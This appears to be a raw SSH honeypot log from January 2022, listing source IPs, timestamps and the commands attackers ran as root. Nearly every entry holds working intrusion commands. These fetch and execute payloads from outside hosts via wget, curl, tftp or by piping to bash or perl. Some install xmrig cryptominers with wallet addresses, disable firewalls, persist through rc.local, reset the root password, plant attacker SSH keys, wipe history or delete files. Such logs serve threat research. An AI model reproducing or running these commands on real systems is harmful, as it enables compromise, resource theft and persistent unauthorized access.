Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/gnmd
chmod 777 gnmd
./gnmd
echo "cd /tmp/">>/etc/rc.local
echo "./gnmd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 188.164.177.173 2-Jan-2022 07:47:15 ssh2 root
Exec help
help

From 140.246.20.243 2-Jan-2022 17:13:12 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s

From 164.92.221.220 3-Jan-2022 03:24:54 ssh2 root
Exec wget nasapaul.com/ninfo ; chmod +x ninfo ; ./ninfo
wget nasapaul.com/ninfo
chmod +x ninfo
./ninfo

From 178.128.203.54 3-Jan-2022 10:20:01 ssh2 root
Exec nproc;uname -s -n -r -i
nproc
uname -s -n -r -i

From 209.141.54.15 3-Jan-2022 10:56:12 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.95.222.119/obins.sh
chmod 777 obins.sh
sh obins.sh
tftp 23.95.222.119 -c get otftp1.sh
chmod 777 otftp1.sh
sh otftp1.sh
tftp -r otftp2.sh -g 23.95.222.119
chmod 777 otftp2.sh
sh otftp2.sh
rm -rf obins.sh otftp1.sh otftp2.sh
rm -rf *

From 164.90.230.201 3-Jan-2022 16:16:20 ssh2 root
Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo
wget https://www.nasapaul.com/ninfo
curl -O https://www.nasapaul.com/ninfo
chmod 777 *
./ninfo

From 209.141.54.15 4-Jan-2022 17:25:05 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://209.141.54.15/zbins.sh; chmod 777 zbins.sh; sh zbins.sh; tftp 209.141.54.15 -c get ztftp1.sh; chmod 777 ztftp1.sh; sh ztftp1.sh; tftp -r ztftp2.sh -g 209.141.54.15; chmod 777 ztftp2.sh; sh ztftp2.sh; rm -rf zbins.sh ztftp1.sh ztftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://209.141.54.15/zbins.sh
chmod 777 zbins.sh
sh zbins.sh
tftp 209.141.54.15 -c get ztftp1.sh
chmod 777 ztftp1.sh
sh ztftp1.sh
tftp -r ztftp2.sh -g 209.141.54.15
chmod 777 ztftp2.sh
sh ztftp2.sh
rm -rf zbins.sh ztftp1.sh ztftp2.sh
rm -rf *

From 165.22.195.82 4-Jan-2022 20:52:27 ssh2 root
Exec echo root:12wsafdsf4rwr234r32w|chpasswd|bash; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G
echo root:12wsafdsf4rwr234r32w|chpasswd|bash
uname -a
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G

From 167.99.209.141 6-Jan-2022 05:58:28 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 167.172.43.16 6-Jan-2022 13:48:27 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G

From 209.141.54.15 6-Jan-2022 21:05:15 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.54.15/wget.sh; curl -O http://209.141.54.15/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 209.141.54.15 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 209.141.54.15; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.54.15/wget.sh
curl -O http://209.141.54.15/wget.sh
chmod 777 wget.sh
sh wget.sh
tftp 209.141.54.15 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 209.141.54.15
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 ftp.sh ftp.sh
sh ftp.sh
rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh
rm -rf *

From 111.175.57.228 8-Jan-2022 04:29:56 ssh2 root
Exec echo -n jy05jpqb|md5sum;uname -a
echo -n jy05jpqb|md5sum
uname -a

From 165.22.195.82 8-Jan-2022 12:50:17 ssh2 root
Exec echo root:12wsafdsf4rwr234r32w|chpasswd|bash; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo root:12wsafdsf4rwr234r32w|chpasswd|bash
uname -a
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 178.138.98.184 10-Jan-2022 03:17:31 ssh2 root
fuck you

From 185.37.209.49 10-Jan-2022 04:37:54 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd
mkdir .ssh
cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k
mv .ssh/.auth_k .ssh/authorized_keys

From 50.212.157.1 10-Jan-2022 06:29:46 ssh2 root
lscpu
w
reboot
/sbin/shutdown
hahah
fucking asshole :))

From 142.44.132.124 10-Jan-2022 09:43:54 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.222.116.91/huh.sh; curl -O http://51.222.116.91/huh.sh; chmod 777 huh.sh; sh huh.sh; tftp 51.222.116.91 -c get huh.sh; chmod 777 huh.sh; sh huh.sh; tftp -r huh2.sh -g 51.222.116.91; chmod 777 huh2.sh; sh huh2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.222.116.91 huh1.sh huh1.sh; sh huh1.sh; rm -rf huh.sh huh.sh huh2.sh huh1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.222.116.91/huh.sh
curl -O http://51.222.116.91/huh.sh
chmod 777 huh.sh
sh huh.sh
tftp 51.222.116.91 -c get huh.sh
chmod 777 huh.sh
sh huh.sh
tftp -r huh2.sh -g 51.222.116.91
chmod 777 huh2.sh
sh huh2.sh
ftpget -v -u anonymous -p anonymous -P 21 51.222.116.91 huh1.sh huh1.sh
sh huh1.sh
rm -rf huh.sh huh.sh huh2.sh huh1.sh
rm -rf *

From 156.226.21.27 11-Jan-2022 01:37:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.99.6.111:1023/Q85;chmod 777 Q85;./Q85;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.99.6.111:1023/Q85
chmod 777 Q85
./Q85
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.99.6.111:1023/Q85;chmod 777 Q85;./Q85;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.99.6.111:1023/Q85
chmod 777 Q85
./Q85

From 209.141.43.126 11-Jan-2022 05:09:41 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed; history -c
cat /etc/issue
cd /tmp/
wget http://179.43.175.83/x86_64
chmod 777 x86_64
./x86_64 x86xhed
history -c

From 209.141.43.126 11-Jan-2022 05:49:27 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed; history -c
cat /etc/issue
cd /tmp/
wget http://179.43.175.83/x86_64
chmod 777 x86_64
./x86_64 x86xhed
history -c

From 134.209.83.158 11-Jan-2022 21:05:15 ssh2 root
Exec echo root:3G4gRrRrtD3 | chpasswd; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
echo root:3G4gRrRrtD3 | chpasswd
uname -a
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 139.59.11.135 12-Jan-2022 07:22:34 ssh2 root
Exec (cd /tmp; wget -qO - 135.125.148.26/bash|perl; curl -s 135.125.148.26/bash|perl > /dev/null)
(cd /tmp
wget -qO - 135.125.148.26/bash|perl
curl -s 135.125.148.26/bash|perl > /dev/null)

From 134.209.83.158 12-Jan-2022 16:27:55 ssh2 root
Exec echo root:3G4gRrRrtD3 | chpasswd; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL
echo root:3G4gRrRrtD3 | chpasswd
uname -a
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL

From 43.245.222.62 12-Jan-2022 21:18:43 ssh2 root
Exec uptime
uptime

From 46.97.177.4 13-Jan-2022 02:57:45 ssh2 root
w
uname -a
ifconfig
cat /etc/passwd
cat /etc/issue
cat /etc/issue
cat /etc/hosts
uname -a
cat /proc/cpuinfo
arp -a
php -v
yum inatsll php -y
apt-get install php
php -v
apt-get install php -y
php -v
w
cd .ssh
ls -a
cd /root
ls -a

From 198.98.49.124 13-Jan-2022 03:00:03 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://176.126.175.75/thatoneguy.sh; chmod 777 thatoneguy.sh; sh thatoneguy.sh;curl --referer https://miner.com http://54.36.242.76/
cat /etc/issue
cd /tmp/
wget http://176.126.175.75/thatoneguy.sh
chmod 777 thatoneguy.sh
sh thatoneguy.sh
curl --referer https://miner.com http://54.36.242.76/

From 45.153.160.2 13-Jan-2022 03:00:27 ssh2 root
ls
ls -as
cd .ssh
ls
apt-get update
apt-get install apache2
apt-get install php
apt-get install php7.0-xml
apt-get install php7.0-sqlite3
apt-get install libapache2-mod-php
sudo systemctl reload apache2
sudo systemctl restart apache2
sudo apt install python-certbot-apache -y
apt-get install php-curl
history -c -y
cd /var/www/html
ls -a
cd /var/www
ls
nano a
unset HISTFILE
unset HISTSAVE
unset HISTLOG
unset
history -n
unset WATCH
mkdir -p /root/.ssh
rm -rf /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEA5b13N4Wos3kc9BR0TcrIlFnUwm6pQ4Dgef+akHeOnlgvhddhlzJzrg5dH3fdYZnuiMKzSJr6vZbqQRXYDX3Se6YYjs65PBZiUmGj+34sdbZZ/WmLbvpqCWfzwGPB6qhfMQZD4rsBJK9vlgNdppZwoX5TiuBfOljcIU5YoCGnG8qtIogGjH88dh/602fwr4k9WJBUMxDwNgOBDr6efhQCFmF0Re2lO7KlHP5y4QRY0OS27GY1THRIKjrgDCi8qrplR+Ly7yDlOC2naLciSeiBypOP0MIwpH80XVXJ3sHV9l2Zc5aAPbHeluUrV4vzMntVpvs05CbIh2o2OmMOXx5ccQ== rsa-key-20201019' >> /root/.ssh/authorized_keys
dc /root
ls

From 46.97.177.4 13-Jan-2022 03:03:14 ssh2 root
perl
ls -as
cd /root
ls -as
cd .ssh
ls
cd .ssh
ls -as
cd Mail
ls
ps x
2
./startx

From 46.97.177.4 13-Jan-2022 03:04:35 ssh2 root
w
uname -a

From 167.172.43.16 13-Jan-2022 10:12:43 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 115.75.37.29 14-Jan-2022 06:12:44 ssh2 root
Exec ls
ls

From 179.43.187.70 14-Jan-2022 12:17:52 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/1a9zxq/7ega.x86; cat 7ega.x86 > x86; chmod +x x86; chmod 777 *; ./x86 rooted.x86; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.187.99/1a9zxq/7ega.x86
cat 7ega.x86 > x86
chmod +x x86
chmod 777 *
./x86 rooted.x86
history -c

From 179.43.187.70 14-Jan-2022 12:19:48 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/cometome; cat cometome > rooted; chmod +x rooted; chmod 777 *; ./rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.187.99/cometome
cat cometome > rooted
chmod +x rooted
chmod 777 *
./rooted
history -c

From 36.7.159.10 14-Jan-2022 16:21:17 ssh2 root
Exec nproc;uname -a;cd /usr/include/;curl -O http://198.199.127.168/apache64;cd /usr/include/;mv apache64 ssl;chmod +x ssl;./ssl;history -c
nproc
uname -a
cd /usr/include/
curl -O http://198.199.127.168/apache64
cd /usr/include/
mv apache64 ssl
chmod +x ssl
./ssl
history -c

From 206.189.102.12 14-Jan-2022 23:57:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 173.212.236.155 15-Jan-2022 19:14:57 ssh2 root
Exec '/bin/sh'
'/bin/sh'

From 198.98.49.124 16-Jan-2022 08:24:08 ssh2 root
Exec crontab -r;pkill xmrig;pkill brrr;pkill wget;mkdir /tmp/OneMan/;cd /tmp/OneMan/;wget http://176.126.175.75/runme.sh;curl http://176.126.175.75/runme.sh -o runme.sh;wget http://85.239.33.9/Nully/arm7;curl http://85.239.33.9/Nully/arm7 -o arm7; chmod 777 arm7;./arm7 UwU-7;chmod 777 runme.sh;sh runme.sh;curl --referer https://uwu-MM.com http://54.36.242.76/
crontab -r
pkill xmrig
pkill brrr
pkill wget
mkdir /tmp/OneMan/
cd /tmp/OneMan/
wget http://176.126.175.75/runme.sh
curl http://176.126.175.75/runme.sh -o runme.sh
wget http://85.239.33.9/Nully/arm7
curl http://85.239.33.9/Nully/arm7 -o arm7
chmod 777 arm7
./arm7 UwU-7
chmod 777 runme.sh
sh runme.sh
curl --referer https://uwu-MM.com http://54.36.242.76/

From 206.189.103.89 16-Jan-2022 18:16:32 ssh2 root
Exec cd /tmp ; mkdir .x ; cd .x ; wget http://20.106.163.35/cnrig ; curl -O http://20.106.163.35/cnrig ; chmod +x cnrig ; mv cnrig systemd ; ./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B ; echo DONE
cd /tmp
mkdir .x
cd .x
wget http://20.106.163.35/cnrig
curl -O http://20.106.163.35/cnrig
chmod +x cnrig
mv cnrig systemd
./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B
echo DONE

From 123.177.42.158 17-Jan-2022 15:30:24 ssh2 root
Exec echo -n 21sao2o4|md5sum;uname -a
echo -n 21sao2o4|md5sum
uname -a

From 43.154.103.13 17-Jan-2022 18:25:38 ssh2 root
Exec command -v curl
command -v curl

From 194.163.133.196 18-Jan-2022 02:36:11 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m

From 209.141.54.15 18-Jan-2022 12:22:11 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.54.15/Pemex.sh; curl -O http://209.141.54.15/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 209.141.54.15 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 209.141.54.15; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.54.15/Pemex.sh
curl -O http://209.141.54.15/Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp 209.141.54.15 -c get Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp -r Pemex2.sh -g 209.141.54.15
chmod 777 Pemex2.sh
sh Pemex2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 Pemex1.sh Pemex1.sh
sh Pemex1.sh
rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh
rm -rf *

From 119.91.250.212 19-Jan-2022 02:59:23 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
uname -a
cd /tmp
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~

From 119.91.250.212 19-Jan-2022 03:07:50 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
uname -a
cd /tmp
curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2

From 81.68.123.185 19-Jan-2022 14:35:01 ssh2 root
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~
Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cd ~
rm -rf .ssh
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys
chmod -R go= ~/.ssh
cd ~

From 45.148.10.163 20-Jan-2022 01:56:53 ssh2 root
